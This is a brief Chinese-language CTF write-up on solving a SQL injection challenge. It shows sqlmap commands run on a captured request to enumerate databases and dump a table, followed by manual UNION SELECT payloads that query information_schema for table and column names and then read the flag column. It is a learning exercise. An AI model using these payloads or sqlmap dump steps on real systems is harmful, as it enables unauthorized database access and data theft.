看到提交框就条件反射sql注入
先sqlmap跑,能跑的情况下优先
把burpsuite抓到的包保存为1.txt
sqlmap -l 1.txt
sqlmap -l 1.txt --dbs
sqlmap -l 1.txt -D news --tables
sqlmap -l 1.txt -D news -T secret_tables --columns --dump
一套组合拳打完,成功拿到flag
当然可以自己手工注入
' and 0 union select 1,table_schema,table_name from information_schema.columns # //and 0用于过滤默认的自带输出,table_schema数据库名,table_name表名
爆出表名,就知道该爆列名了
' and 0 union select 1,column_name,3 from information_schema.columns where table_name='secret_table' #
知道列名就能拿到flag
' and 0 union select 1,2,fl4g from secret_table #
参考视频链接:https://www.bilibili.com/video/BV1Lq4y1p7iJ/